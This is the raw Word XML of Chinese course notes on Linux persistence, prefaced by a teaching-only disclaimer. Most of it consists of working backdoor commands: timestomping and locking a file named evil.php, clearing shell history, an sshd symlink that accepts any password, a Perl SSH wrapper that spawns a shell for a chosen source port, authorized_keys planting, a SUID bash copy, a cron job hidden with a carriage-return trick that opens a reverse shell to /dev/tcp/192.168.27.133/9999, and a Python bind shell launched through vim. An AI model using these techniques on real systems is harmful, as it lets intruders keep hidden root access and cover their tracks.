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免责声明： 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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。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希望同学们知法、懂法、守法，做一个良好公民。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default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Linux权限维持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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1、修改文件属性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touch evil.php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#创建恶意文件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touch -r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~/redis_start.txt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evil.php #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-r选项允许你复制另一个文件的时间属性到当前指定的文件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932305"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175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chattr +i evil.php #锁定文件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rm -rf evil.php #提示禁止删除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lsattr evil.php #属性查看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chattr -i evil.php #解除锁定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rm -rf evil.php #彻底删除文件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748280"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="16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2、禁用历史记录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set +o history #临时禁用历史记录，但该命令本身也会被记录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set -o history #恢复使用历史记录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history -r #删除当前会话历史记录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history -c #删除内存中的所有命令历史</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2849880" cy="701040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cat .bash_history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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>历史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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>记录文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2014855"/>
            <wp:effectExtent l="0" t="0" r="14605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70500" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="254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echo &gt; ~/.bash_history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#彻底清除历史记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3710940" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="762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3、SSH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软链接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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建立一个软连接，然后通过888端口访问ssh服务，且可以任意密码登录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n -sf /usr/sbin/sshd /tmp/su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#将 /usr/sbin/sshd 文件或目录创建一个符号链接到 /tmp/su。这意味着当你通过 /tmp/su 访问时，实际上会访问到 /usr/sbin/sshd。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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-s：表示创建符号链接（软链接），而不是硬链接。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-f：如果目标位置已存在文件或链接，强制覆盖。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/tmp/su -oPort=888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#设置监听端口指向 /tmp/su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770890"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="9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ssh root@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123.180.45.253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-p 888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468120"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="13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4、SSH Wrapper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将恶意端口来源访问传输内容重定向到/bin/sh中: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cd /usr/sbin/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mv sshd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../bin/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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/sbin/sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 移动到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/usr/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录下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echo ‘#!/usr/bin/perl’ &gt;sshd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#在执行脚本时告诉操作系统使用perl解释器来运行这个文件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echo ‘exec “/bin/sh” if(getpeername(STDIN) =~ /^..4A/);’ &gt;&gt;sshd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#标准输入（STDIN）的源地址以特定字符串（这里是"..4A";匹配13377）开头，则执行 /bin/sh，即启动一个shell。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echo ‘exec{“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,’ &gt;&gt;sshd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#对其他普通连接则调用正常的SSH服务器程序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chmod u+x sshd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systemctl restart ssh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486535"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="10" name="图片 2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然后连接：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socat STDIO TCP4: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123.180.45.253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:22,sourceport=13377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2734945"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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297940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="7" name="图片 2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7" descr="IMG_2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5、SSH 公钥免密登陆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本地生成公钥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ssh-keygen -t rsa（三次回车）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4244975"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="14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9" descr="IMG_2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公钥id_rsa.pub发送到目标上.ssh/authorized_keys里（可以python传文件到目标）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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cd /root/.ssh/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python3 -m http.server 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1636395"/>
            <wp:effectExtent l="0" t="0" r="3810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2593975"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1206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cat id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys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852930"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="8" name="图片 3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0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然后就可以免密登录了：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ssh root@123.180.45.253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366520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="11" name="图片 3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6、SUID 后门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当 s 权限在文件所有者 x 权限位上时，例如：-rwsr-xr-x，此时称为 Set UID，简称为 SUID的特殊权限，即当执行该文件时将具有该文件所有者的权限；当 s 权限在文件组x 权限上时，例如：-rwx--s--x，此时称为 Set GID，简称为 SGID 的特殊权限，执行者在执行该文件时将具有该文件所属组的权限。）必要条件：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1、SUID权限仅对二进制程序有效。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2、执行者对于该程序需要具有x的可执行权限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3、本权限仅在执行该程序的过程中有效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4、在执行过程中执行者将具有该程序拥有者的权限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创建suid权限的文件：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cp /bin/bash /tmp/.woot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chmod u+s /tmp/.woot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ls -al /tmp/.woot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147445"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795"/>
            <wp:docPr id="1" name="图片 3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3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使用普通用户运行得到root权限：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/tmp/.woot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/tmp/.woot -p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#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bash2 针对 suid 有一些护卫的措施，使用-p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选项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来获取一个root shell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299845"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795"/>
            <wp:docPr id="2" name="图片 3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4" descr="IMG_2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7、Cron 后门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用crontab设置隐藏的计划任务，该任务每分钟回连一次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bidi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(crontab -l;printf "*/1 * * * * bash -i &gt;&amp; /dev/tcp/192.168.27.133/9999 0&gt;&amp;1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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9790" cy="1738630"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1397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#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printf：构造一个新的cron定时任务条目，该任务每分钟执行一次（*/1 * * * *），并启动一个bash shell（bash -i）将其标准输入和输出重定向到指定IP地址（123.180.45.47）和端口（9999），这样攻击者就可以通过网络连接获取一个交互式shell。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#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/bin/bash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--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noprofile -i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：启动一个不加载用户配置文件的交互式bash shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">\rno crontab for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%100c\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将 \r 后面的内容移到字符串开头，并逐一替换开头部分的字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，使得终端显示“no crontab for [用户名]”。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#|crontab -：将上述命令的结果通过管道传递给 crontab - 命令，- 表示将标准输入中的内容作为新的cron定时任务列表载入。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691515"/>
            <wp:effectExtent l="0" t="0" r="3810" b="952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此时计划任务是看不到的，但已经反弹shell了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0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5939790" cy="1963420"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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8、Vim python2扩展后门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vim安装时默认安装了当前服务器的python版本的扩展，利用该扩展，可以用vim的扩展pyfile来执行python脚本。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在目标主机上写入py脚本，该脚本用于开启监听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from socket import *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import subprocess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import os, threading, sys, time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if __name__ == “__main__“:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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server=socket(AF_INET,SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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server.bind((‘0.0.0.0’,2233))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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server.listen(5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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print ‘waiting for connect’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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talk, addr = server.accept()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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print ‘connect from’,addr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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proc = subprocess.Popen([“/bin/sh”,”-i”], stdin=talk, stdout=talk, stderr=talk, shell=True)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775460"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="3" name="图片 3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7" descr="IMG_26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使用vim运行该脚本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nohup vim -E -c “pyfile attack.py”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034415"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="4" name="图片 3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8" descr="IMG_27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使用nc连接成功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171065"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="5" name="图片 3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9" descr="IMG_2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wMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="010435A8"/>
    <w:rsid w:val="01914632"/>
    <w:rsid w:val="02F327FE"/>
    <w:rsid w:val="0411346B"/>
    <w:rsid w:val="04745EB1"/>
    <w:rsid w:val="054D60FD"/>
    <w:rsid w:val="05635319"/>
    <w:rsid w:val="05AA2098"/>
    <w:rsid w:val="08AD1D28"/>
    <w:rsid w:val="09793B73"/>
    <w:rsid w:val="098047A9"/>
    <w:rsid w:val="09C7321B"/>
    <w:rsid w:val="0B695340"/>
    <w:rsid w:val="0C822BB5"/>
    <w:rsid w:val="0CAF4598"/>
    <w:rsid w:val="0CD50A5F"/>
    <w:rsid w:val="0E1F0BBB"/>
    <w:rsid w:val="0FC55A86"/>
    <w:rsid w:val="0FEC62C8"/>
    <w:rsid w:val="10C93342"/>
    <w:rsid w:val="114A0E7B"/>
    <w:rsid w:val="11570F29"/>
    <w:rsid w:val="1221241B"/>
    <w:rsid w:val="127E28E2"/>
    <w:rsid w:val="12CE1E35"/>
    <w:rsid w:val="131D0BBB"/>
    <w:rsid w:val="13352CE1"/>
    <w:rsid w:val="13983200"/>
    <w:rsid w:val="13A55A1C"/>
    <w:rsid w:val="13C627F3"/>
    <w:rsid w:val="13D440B7"/>
    <w:rsid w:val="150F7126"/>
    <w:rsid w:val="15460DEA"/>
    <w:rsid w:val="157D1577"/>
    <w:rsid w:val="161B72B9"/>
    <w:rsid w:val="167C0D2B"/>
    <w:rsid w:val="168E1415"/>
    <w:rsid w:val="1697343C"/>
    <w:rsid w:val="172B3BFE"/>
    <w:rsid w:val="19192240"/>
    <w:rsid w:val="193D7C76"/>
    <w:rsid w:val="1A385A13"/>
    <w:rsid w:val="1AA40EE6"/>
    <w:rsid w:val="1B2B63C1"/>
    <w:rsid w:val="1BB51EC1"/>
    <w:rsid w:val="1D2A3E2C"/>
    <w:rsid w:val="1D9E6340"/>
    <w:rsid w:val="1DE12B25"/>
    <w:rsid w:val="1F890B7E"/>
    <w:rsid w:val="1F9749F8"/>
    <w:rsid w:val="1FA27791"/>
    <w:rsid w:val="1FA96F10"/>
    <w:rsid w:val="205A4E43"/>
    <w:rsid w:val="209669C5"/>
    <w:rsid w:val="237B2E3F"/>
    <w:rsid w:val="23DC40A3"/>
    <w:rsid w:val="24314289"/>
    <w:rsid w:val="24327D07"/>
    <w:rsid w:val="24C83C46"/>
    <w:rsid w:val="24D63974"/>
    <w:rsid w:val="25E87A4B"/>
    <w:rsid w:val="27CC71CA"/>
    <w:rsid w:val="283B39B4"/>
    <w:rsid w:val="2AA66B98"/>
    <w:rsid w:val="2ABD4734"/>
    <w:rsid w:val="2B6A6567"/>
    <w:rsid w:val="2B9601FE"/>
    <w:rsid w:val="2D0B272F"/>
    <w:rsid w:val="2D185BC2"/>
    <w:rsid w:val="2E283D2E"/>
    <w:rsid w:val="2F906DAB"/>
    <w:rsid w:val="2FAF1ED5"/>
    <w:rsid w:val="2FDD7BBA"/>
    <w:rsid w:val="2FDE0572"/>
    <w:rsid w:val="2FE74788"/>
    <w:rsid w:val="2FF8610C"/>
    <w:rsid w:val="304D32BE"/>
    <w:rsid w:val="30A03AB3"/>
    <w:rsid w:val="31AE191D"/>
    <w:rsid w:val="31EE3E4C"/>
    <w:rsid w:val="32B37CAB"/>
    <w:rsid w:val="32BB68B9"/>
    <w:rsid w:val="339316C7"/>
    <w:rsid w:val="35610116"/>
    <w:rsid w:val="366A298B"/>
    <w:rsid w:val="373A6B99"/>
    <w:rsid w:val="389B670D"/>
    <w:rsid w:val="3AD538EB"/>
    <w:rsid w:val="3B0A5FE2"/>
    <w:rsid w:val="3CAD2526"/>
    <w:rsid w:val="3D504CF4"/>
    <w:rsid w:val="3E023612"/>
    <w:rsid w:val="3E520DC7"/>
    <w:rsid w:val="4027468A"/>
    <w:rsid w:val="409E2B5E"/>
    <w:rsid w:val="41580865"/>
    <w:rsid w:val="42A94AFD"/>
    <w:rsid w:val="43FF3554"/>
    <w:rsid w:val="442C6CCF"/>
    <w:rsid w:val="45C5024D"/>
    <w:rsid w:val="45D773FA"/>
    <w:rsid w:val="45F66EA4"/>
    <w:rsid w:val="467806FB"/>
    <w:rsid w:val="48B80A32"/>
    <w:rsid w:val="4B351078"/>
    <w:rsid w:val="4B3F0AFB"/>
    <w:rsid w:val="4CC1510F"/>
    <w:rsid w:val="4CED2167"/>
    <w:rsid w:val="4CF32097"/>
    <w:rsid w:val="4E2B4BD8"/>
    <w:rsid w:val="4EBF0626"/>
    <w:rsid w:val="4FF461D6"/>
    <w:rsid w:val="51021475"/>
    <w:rsid w:val="51894076"/>
    <w:rsid w:val="52324416"/>
    <w:rsid w:val="536E572E"/>
    <w:rsid w:val="53A414A2"/>
    <w:rsid w:val="53D438C9"/>
    <w:rsid w:val="54401152"/>
    <w:rsid w:val="545A4CDB"/>
    <w:rsid w:val="5529786C"/>
    <w:rsid w:val="55EC4969"/>
    <w:rsid w:val="5696214F"/>
    <w:rsid w:val="56C830BC"/>
    <w:rsid w:val="58B30533"/>
    <w:rsid w:val="59697EE0"/>
    <w:rsid w:val="5C816D6B"/>
    <w:rsid w:val="5CCC52A0"/>
    <w:rsid w:val="5D7B5F87"/>
    <w:rsid w:val="5DF97B7F"/>
    <w:rsid w:val="5E4D30F4"/>
    <w:rsid w:val="608F6263"/>
    <w:rsid w:val="6150643A"/>
    <w:rsid w:val="623B0DD0"/>
    <w:rsid w:val="62930806"/>
    <w:rsid w:val="634E3149"/>
    <w:rsid w:val="63D074B3"/>
    <w:rsid w:val="63E421C2"/>
    <w:rsid w:val="6635628F"/>
    <w:rsid w:val="66B73B69"/>
    <w:rsid w:val="6A366F42"/>
    <w:rsid w:val="6A986D85"/>
    <w:rsid w:val="6BDA6675"/>
    <w:rsid w:val="6C1E16E9"/>
    <w:rsid w:val="6CC647CC"/>
    <w:rsid w:val="6D1D2EAC"/>
    <w:rsid w:val="6D54535E"/>
    <w:rsid w:val="6DF7068A"/>
    <w:rsid w:val="6EB47D3A"/>
    <w:rsid w:val="6EB72172"/>
    <w:rsid w:val="717E7746"/>
    <w:rsid w:val="72B811C2"/>
    <w:rsid w:val="73504D4A"/>
    <w:rsid w:val="756E3325"/>
    <w:rsid w:val="759909EB"/>
    <w:rsid w:val="76305A1C"/>
    <w:rsid w:val="76961CD3"/>
    <w:rsid w:val="76DA5393"/>
    <w:rsid w:val="77412895"/>
    <w:rsid w:val="78064D32"/>
    <w:rsid w:val="79AE42E2"/>
    <w:rsid w:val="79B06CD4"/>
    <w:rsid w:val="7ABC2DEA"/>
    <w:rsid w:val="7B552996"/>
    <w:rsid w:val="7C0E1C6B"/>
    <w:rsid w:val="7C134586"/>
    <w:rsid w:val="7DEA3E2D"/>
    <w:rsid w:val="7DFA4004"/>
    <w:rsid w:val="7E477671"/>
    <w:rsid w:val="7EE540FF"/>
    <w:rsid w:val="7F0D0245"/>
    <w:rsid w:val="7F58436E"/>
    <w:rsid w:val="7FFD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Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/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2023-09-21T06:13:00Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-31T03:43:54Z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4F64CD81384A438E859B2E84C2553F51_12</vt:lpwstr>
  </property>
</Properties>
</file>